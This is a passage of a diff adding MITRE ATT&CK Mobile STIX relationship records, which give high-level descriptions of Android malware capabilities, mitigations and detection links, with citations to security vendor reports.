"relationship--ca4eb452-4a2f-41d7-a015-81f43e96737e", + "type": "relationship", + "created": "2019-09-23T13:36:08.386Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. 
Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-09-23T13:36:08.386Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects the device's IMEI and sends it to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d09a4d42-45bd-4b2a-aef4-3aa3982115ad", + "created": "2022-04-05T19:45:03.117Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:45:03.117Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--abf3b5c8-9ee5-42ff-ba94-2b3a15317783", + "created": "2023-03-20T18:55:51.580Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:51.580Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": 
"attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22f3d28b-ba0c-4aa3-99b4-60790ba9c7b6", + "type": "relationship", + "created": "2021-01-05T20:16:20.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.484Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can track the device’s location.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4761145d-34ac-4b45-a0d6-a09b1907a196", + "type": "relationship", + "created": "2020-12-18T20:14:47.367Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.367Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can inject clicks to launch applications, share posts on social media, and interact with WebViews to perform fraudulent actions.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4019493-bd52-4011-9355-8902be6ff3f3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:19.083Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) registers the broadcast receiver to listen for events related to device boot-up.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--70367e5c-15e0-4bcd-b538-7a90c4eefd30", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:26:35.443Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) maintains persistence by installing an Android application package (APK) on the system partition.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d1e11627-23e4-40f3-bcbc-2b832b0bbaa3", + "created": "2023-02-28T20:31:31.983Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:31:31.983Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can intercept SMS messages and USSD messages from Telcom operators.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4e4c3ae-4c4d-4eba-8330-022464cbf828", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:33:12.082Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests SMS and MMS messages from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--95bf4e8b-f388-48a0-b236-c2077252e71e", + "type": "relationship", + "created": "2019-09-03T20:08:00.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . 
Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.380Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) gathers the device IMEI to send to the command and control server.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5a96d87e-f70e-49dc-a272-c98aad672ce0", + "type": "relationship", + "created": "2019-09-15T15:32:17.563Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-07-09T14:07:02.315Z", + "description": "Application developers could be encouraged to avoid placing sensitive data in notification text.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c374c9ce-ff30-4daa-bdec-8015a507746a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.145Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) has a capability to obtain files from other installed applications.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7db33293-6971-4c0d-88e0-18f505ebd943", + "created": "2022-04-05T20:11:51.188Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Recent OS versions have made it more difficult for applications to register as VPN providers. ", + "modified": "2022-04-05T20:11:51.188Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3be6ad82-722d-4699-8e3a-c1ea60018244", + "created": "2023-03-16T13:32:55.140Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T13:32:55.140Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": 
"3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ca0d9894-0c37-4a34-9b24-1887b7cd1106", + "created": "2023-03-15T16:26:38.465Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:26:38.465Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b309c25a-6baf-4874-829d-63712a38652c", + "created": "2023-02-06T19:02:16.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:21:41.461Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can grant itself camera permissions.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0cae6859-d7d1-483b-b473-4f32084938a9", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.818Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) has the ability to record device audio.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--27f5dc22-6ab9-406f-9092-6cb610d777a6", + "created": "2022-04-01T14:59:53.782Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken devices.", + "modified": "2022-04-01T14:59:53.782Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--280aa15d-c7ff-4005-9861-9fc5c3bfe95a", + "created": "2020-12-28T18:47:52.357Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. 
Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:22:26.702Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can run commands as root.(Citation: Palo Alto HenBox) ", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a821e14-8247-408b-af37-9cecbba616ec", + "type": "relationship", + "created": "2020-05-07T15:33:32.945Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." 
+ } + ], + "modified": "2020-05-07T15:33:32.945Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) obtains the device’s application list.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. 
Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Some original variants of [BrainTest](https://attack.mitre.org/software/S0293) had the capability to automatically root some devices, but that behavior was not observed in later samples.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5a18e6c3-4bbf-4418-8815-55ebf283c8a1", + "created": "2020-10-29T17:48:27.272Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain a list of installed applications and can detect if an antivirus application is running, and close it if it is.(Citation: Threat Fabric Exobot)", + "modified": "2022-04-15T16:53:00.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6ca3e3d9-2db9-4bed-98a0-417ff1e6a78e", + "type": "relationship", + "created": "2021-02-08T16:36:20.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "modified": "2021-05-24T13:16:56.443Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included system information enumeration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66132260-65d1-4bf5-8200-abdb2014be6f", + "created": "2020-09-15T15:18:12.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:51:12.881Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can detect if it is running in an emulator and adjust its behavior accordingly.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe", + "type": "relationship", + "created": "2019-12-10T16:07:41.093Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.093Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can download code and binaries from the C2 server to execute on the device as root.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--44da429b-9dee-43c9-9397-445c6f9e647e", + "created": "2022-03-30T19:54:59.651Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android includes system partition integrity mechanisms that could detect unauthorized modifications. 
", + "modified": "2022-03-30T19:54:59.651Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--73d78f2c-dd3b-469c-a622-e2e89cb521d3", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Enterprises can provision policies to mobile devices that require a minimum complexity (length, character requirements, etc.) for the device passcode, and cause the device to wipe all data if an incorrect passcode is entered too many times. Both policies would mitigate brute-force, guessing, or shoulder surfing of the device passcode. Enterprises can also provision policies to disable biometric authentication, however, biometric authentication can help make using a longer, more complex passcode more practical because it does not need to be entered as frequently. 
", + "modified": "2022-03-28T19:20:30.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cacc0b72-9d73-4381-90e9-545ba908722c", + "type": "relationship", + "created": "2019-09-15T15:35:33.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "source_name": "Talos Gustuff Apr 2019" + } + ], + "modified": "2019-09-15T15:35:33.215Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) injects the global action `GLOBAL_ACTION_BACK` to mimic pressing the back button to close the application if a call to an open antivirus application is detected.(Citation: Talos Gustuff Apr 2019)", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c43341e3-6fb9-46f1-8ea3-8daede1a4c77", + "created": "2022-04-06T15:52:41.579Z", 